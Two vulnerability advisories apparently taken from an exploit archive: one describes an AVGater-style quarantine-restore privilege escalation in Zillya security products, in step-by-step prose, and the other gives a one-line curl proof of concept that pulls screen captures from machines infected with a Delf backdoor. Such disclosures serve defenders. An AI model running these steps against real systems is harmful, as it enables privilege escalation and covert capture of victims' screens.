<pre><code># Title: Zillya Total Security - Link Following Local Privilege Escalation (AVGater) Vulnerability<br /># Date: 02.12.2022<br /># Author: M. Akil Gündoğan <br /># Contact: https://twitter.com/akilgundogan<br /># Vendor Homepage: https://zillya.com/<br /># Software Link: (https://download.zillya.com/ZTS3.exe) / (https://download.zillya.com/ZIS3.exe)<br /># Version: IS (3.0.2367.0) / TS (3.0.2368.0)<br /># Tested on: Windows 10 Professional x64<br /># PoC Video: https://youtu.be/vRCZR1kd89Q<br /><br />Vulnerabiliy Description: <br />---------------------------------------<br />Zillya's processes run in SYSTEM privileges. The user with low privileges in the system can copy any file they want <br />to any location by using the quarantine module in Zillya. This is an example of AVGater vulnerabilities that are often <br />found in antivirus programs. <br /><br />You can read the article about AVGater vulnerabilities here: <br />https://bogner.sh/2017/11/avgater-getting-local-admin-by-abusing-the-anti-virus-quarantine/<br /><br />The vulnerability affects both "Zillya Total Security" and "Zillya Internet Security" products.<br /><br />Step by step produce:<br />---------------------------------------<br />1 - Attackers create new folder and into malicious file. It can be a DLL or any file. <br /><br />2 - Attacker waits for "Zillya Total Security" or "Zillya Internet Security" to quarantine him.<br /><br />3 - The created folder is linked with the Google Symbolic Link Tools "Create Mount Point" tools to the folder that <br />the current user does not have write permission to. <br /><br />You can find these tools here: https://github.com/googleprojectzero/symboliclink-testing-tools <br /><br />4 - Restores the quarantined file. When checked, it is seen that the file has been moved to an unauthorized location. <br />This is evidence of escalation vulnerability. An attacker with an unauthorized user can write to directories that require <br />authorization. Using techniques such as DLL hijacking, it can gain access to SYSTEM privileges.<br /><br />Advisories:<br />---------------------------------------<br />Developers should not allow unauthorized users to restore from quarantine unless necessary. <br /><br />Also, it should be checked whether the target file has been copied to the original location. Unless necessary, users <br />should not be able to interfere with processes running with SYSTEM privileges. All processes on the user's side should <br />be run with normal privileges.<br /><br />Disclosure Timeline:<br />---------------------------------------<br />13.11.2022 - Vulnerability reported via email but no response was given and the fix was not released.<br />02.12.2022 - Full disclosure.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/8872c2ec49ff3382240762a029631684.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Backdoor.Win32.Delf.gj<br />Vulnerability: Information Disclosure<br />Description: The malware listens on TCP port 80. Third-party adversaries who can reach an infected system can pass "netscreen.jpg" for the User-agent: header in the HTTP request to download victim machines screen captures.<br />Family: Delf<br />Type: PE32<br />MD5: 8872c2ec49ff3382240762a029631684<br />Vuln ID: MVID-2022-0663<br />Disclosure: 12/01/2022<br /><br /><br />Exploit/PoC:<br />curl http://x.x.x.x -H "User-agent: netscreen.jpg" --output screendump.jpg<br /> % Total % Received % Xferd Average Speed Time Time Time Current<br /> Dload Upload Total Spent Left Speed<br />100 215k 100 215k 0 0 215k 0 0:00:01 --:--:-- 0:00:01 1976k<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>